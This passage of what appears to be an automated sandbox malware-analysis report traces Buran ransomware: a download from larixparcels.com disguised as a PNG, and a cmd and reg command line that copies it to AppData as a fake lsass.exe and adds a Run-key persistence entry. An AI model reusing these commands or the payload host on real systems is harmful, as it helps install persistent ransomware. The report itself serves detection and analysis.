Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Map - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE True 1
Fn
User (11)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 10
Fn
System (11)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Get Network Adapter Info - False 1
Fn
Get Network Adapter Info - True 1
Fn
Mutex (22)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Create mutex_name = Global\.net clr networking True 5
Fn
Release mutex_name = Global\.net clr networking True 1
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (118)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 111
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\5p5NrGJn0jS HALPmcxz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\5p5NrGJn0jS HALPmcxz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (1)
»
Operation Additional Information Success Count Logfile
Resolve Name host = larixparcels.com, address_out = 104.27.179.224, 104.27.178.224 True 1
Fn
HTTP Sessions (1)
»
Information Value
Total Data Sent 101 bytes
Total Data Received 284.52 KB
Contacted Host Count 1
Contacted Hosts 104.27.179.224
HTTP Session #1
»
Information Value
User Agent Google Chrome
Server Name larixparcels.com
Server Port 80
Username -
Password -
Data Sent 101 bytes
Data Received 284.52 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Google Chrome True 1
Fn
Open Connection protocol = http, server_name = larixparcels.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /logo.png True 1
Fn
Send HTTP Request headers = User-Agent: Google Chrome, Host: larixparcels.com, Connection: Keep-Alive, url = larixparcels.com/logo.png True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 54304 True 1
Fn
Data
Read Response size = 65536, size_out = 18980 True 1
Fn
Data
Read Response size = 65536, size_out = 65536 True 2
Fn
Data
Read Response size = 65536, size_out = 35368 True 1
Fn
Data
Read Response size = 47530, size_out = 29200 True 1
Fn
Data
Read Response size = 18330, size_out = 18330 True 1
Fn
Data
Close Session - True 1
Fn
Process #4: tempxee84.png
2109 2
»
Information Value
ID #4
File Name c:\users\5p5nrg~1\appdata\local\tempxee84.png
Command Line C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:49, Reason: Child Process
Unmonitor End Time: 00:01:16, Reason: Self Terminated
Monitor Duration 00:00:26
OS Process Information
»
Information Value
PID 0xb38
Parent PID 0xa54 (c:\windows\system32\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B3C
0x BA4
0x BAC
0x BB0
0x BB4
0x BB8
0x BBC
0x 570
0x 6FC
0x 90C
0x 6B4
Hook Information
»
Type Installer Target Size Information Actions
Code private_0x0000000000250000:+0x2929 tempxee84.png:+0x361d 1.50 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x3000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x4000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x5000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x6000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x7000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x8000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x9000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0xa000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0xb000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0xc000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0xd000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0xe000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0xf000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x10000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x11000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x12000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x13000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x14000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x15000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x16000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x17000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x18000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x19000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x1a000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x1b000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x1c000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x1d000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x1e000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x1f000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x20000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x21000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x22000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x23000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x24000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x25000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x26000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x27000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x28000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x29000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x2a000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x2b000 7.03 KB -
Code private_0x0000000000250000:+0x294c tempxee84.png:+0x2c000 4.03 KB -
Code private_0x0000000000250000:+0x3296 tempxee84.png:+0x1000 260.00 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x1000 3.50 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x1000 28.00 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x2200 3.00 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x3200 3.00 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x4200 3.00 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x5200 3.00 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x6200 3.00 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x7200 3.00 KB -
Code private_0x0000000000250000:+0x2f77 tempxee84.png:+0x8200 2.00 KB -
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\197BD661.buran 1 bytes MD5: 93b885adfe0da089cdf634904fd59f71
SHA1: 5ba93c9db0cff93f52b521d7420e43f6eda2784f
SHA256: 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d
SSDeep: 3::
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB MD5: 2db89fb48fd886b621627751f2ae15ed
SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066
SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166
SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8
False
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\AppData\Local\Temp\197BD661.buran desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE True 1
Fn
Write C:\Users\5P5NRG~1\AppData\Local\Temp\197BD661.buran size = 1 True 1
Fn
Data
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\197BD661.buran - True 1
Fn
Registry (32)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Borland\Locales - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Borland\Locales - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Borland\Delphi\Locales - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - False 29
Fn
Process (3)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0x908, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\system32\cmd.exe show_window = SW_HIDE True 1
Fn
Module (35)
»
Operation Module Additional Information Success Count Logfile
Load C:\Users\5P5NRG~1\AppData\Local\TempxeE84.ENU base_address = 0x0 False 1
Fn
Load C:\Users\5P5NRG~1\AppData\Local\TempxeE84.EN base_address = 0x0 False 1
Fn
Get Handle c:\users\5p5nrg~1\appdata\local\tempxee84.png base_address = 0x400000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75220000 True 1
Fn
Get Filename c:\users\5p5nrg~1\appdata\local\tempxee84.png process_name = c:\users\5p5nrg~1\appdata\local\tempxee84.png, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png, size = 261 True 1
Fn
Get Filename - process_name = c:\users\5p5nrg~1\appdata\local\tempxee84.png, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png, size = 261 True 1
Fn
Get Filename C:\Users\5P5NRG~1\AppData\Local\TempxeE84.EN process_name = c:\users\5p5nrg~1\appdata\local\tempxee84.png, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png, size = 261 True 2
Fn
Get Filename C:\Users\5P5NRG~1\AppData\Local\TempxeE84.EN process_name = c:\users\5p5nrg~1\appdata\local\tempxee84.png, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png, size = 522 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceExA, address_out = 0x76cb434f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VariantChangeTypeEx, address_out = 0x75224c28 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x7529c802 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x7529ec66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x75245934 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x7529d332 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x7529dbd4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x7529e405 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x7529f00a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x7529f15e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x75245a98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x7529ecfa True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x7529ee2e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x7523b0dc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarI4FromStr, address_out = 0x75236fab True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromStr, address_out = 0x752401a0 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR8FromStr, address_out = 0x7523699e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromStr, address_out = 0x75246ba7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyFromStr, address_out = 0x75266c12 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBoolFromStr, address_out = 0x7523dbd1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromCy, address_out = 0x75247fdc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromDate, address_out = 0x75237a2a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromBool, address_out = 0x75240355 True 1
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Get Info type = 0, result_out = 4 True 1
Fn
System (534)
»
Operation Additional Information Success Count Logfile
Sleep duration = 666 milliseconds (0.666 seconds) True 1
Fn
Sleep duration = 10 milliseconds (0.010 seconds) True 29
Fn
Get Time type = Performance Ctr, time = 18022079397 True 1
Fn
Get Time type = Ticks, time = 122585 True 1
Fn
Get Info type = Operating System True 501
Fn
Get Info type = Operating System True 1
Fn
Environment (5)
»
Operation Additional Information Success Count Logfile
Get Environment String name = TEMP, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 2
Fn
Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 39 bytes
Total Data Received 380 bytes
Contacted Host Count 1
Contacted Hosts 158.69.67.193
HTTP Session #1
»
Information Value
Server Name geoiptool.com
Server Port 80
Username -
Password -
Data Sent 39 bytes
Data Received 380 bytes
Operation Additional Information Success Count Logfile
Open Session access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = geoiptool.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1 True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://geoiptool.com True 1
Fn
Read Response size = 1024, size_out = 1024 True 19
Fn
Data
Read Response size = 1024, size_out = 818 True 1
Fn
Data
Read Response size = 1024, size_out = 0 True 1
Fn
Close Session - True 1
Fn
Process #6: cmd.exe
85 0
»
Information Value
ID #6
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /e:on /c md "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png" "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" & reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe\" *"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:13, Reason: Child Process
Unmonitor End Time: 00:01:14, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x908
Parent PID 0xb38 (c:\users\5p5nrg~1\appdata\local\tempxee84.png)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 904
Downloaded Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png 284.00 KB MD5: 6c5950534d6c12899d81aba98826e4a4
SHA1: cc40ce4348ca01bb704c4872485c6f2351dbb72d
SHA256: 76daccd52aa8dd99c976ab8f4be508fdbafecf58d612ae0179b0fa3802721a9d
SSDeep: 6144:6h3+b9449fllCuQR7kVn+8QEfMiZ0X2T:6By944lllrQRkn+W7
False
Host Behavior
File (34)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows - False 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png type = file_attributes True 1
Fn
Get Info STD_INPUT_HANDLE type = file_type True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe type = file_attributes False 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe type = file_attributes True 1
Fn
Get Info System Paging File type = file_type False 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 8
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open - - False 2
Fn
Copy C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe source_filename = C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png True 1
Fn
Read STD_INPUT_HANDLE size = 512, size_out = 512 True 1
Fn
Data
Write STD_ERROR_HANDLE size = 104 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 27 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\reg.exe os_pid = 0x73c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Get Info c:\windows\syswow64\cmd.exe type = PROCESS_PAGE_PRIORITY True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a840000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:09 (UTC) True 1
Fn
Get Time type = Ticks, time = 133973 True 1
Fn
Get Time type = Performance Ctr, time = 19382815680 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #7: reg.exe
41 0
»
Information Value
ID #7
File Name c:\windows\syswow64\reg.exe
Command Line reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe\" *"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:13, Reason: Child Process
Unmonitor End Time: 00:01:14, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x73c
Parent PID 0x908 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 694
Host Behavior
File (5)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Write STD_OUTPUT_HANDLE size = 39 True 1
Fn
Data
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System - False 1
Fn
Read Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = Local Security Authority Subsystem Service False 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = Local Security Authority Subsystem Service, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" *, size = 156, type = REG_SZ True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\reg.exe base_address = 0xc0000 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:10 (UTC) True 1
Fn
Get Time type = Ticks, time = 134160 True 1
Fn
Get Time type = Performance Ctr, time = 19407615947 True 1
Fn
Process #8: lsass.exe
3252 4
»
Information Value
ID #8
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" *
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:01:40, Reason: Self Terminated
Monitor Duration 00:00:25
OS Process Information
»
Information Value
PID 0xc4
Parent PID 0xb38 (c:\users\5p5nrg~1\appdata\local\tempxee84.png)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 6A8
0x 590
0x 7E0
0x 7BC
0x 53C
0x 788
0x 240
0x 15C
0x 7FC
0x 7C8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
lsass.exe 0x00400000 0x00448FFF Relevant Image - 32-bit - True False
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\197BD661.buran 1 bytes MD5: 93b885adfe0da089cdf634904fd59f71
SHA1: 5ba93c9db0cff93f52b521d7420e43f6eda2784f
SHA256: 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d
SSDeep: 3::
False
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\AppData\Local\Temp\5B51C018.buran desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE True 1
Fn
Write C:\Users\5P5NRG~1\AppData\Local\Temp\5B51C018.buran size = 1 True 1
Fn
Data
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\5B51C018.buran - True 1
Fn
Registry (583)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Buran III\Service - True 2
Fn
Create Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Borland\Locales - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Borland\Locales - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Borland\Delphi\Locales - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III\Service - False 2
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - False 84
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 15
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 3
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 9
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 122
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 72
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 3
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 11
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Knock, type = REG_NONE False 1
Fn
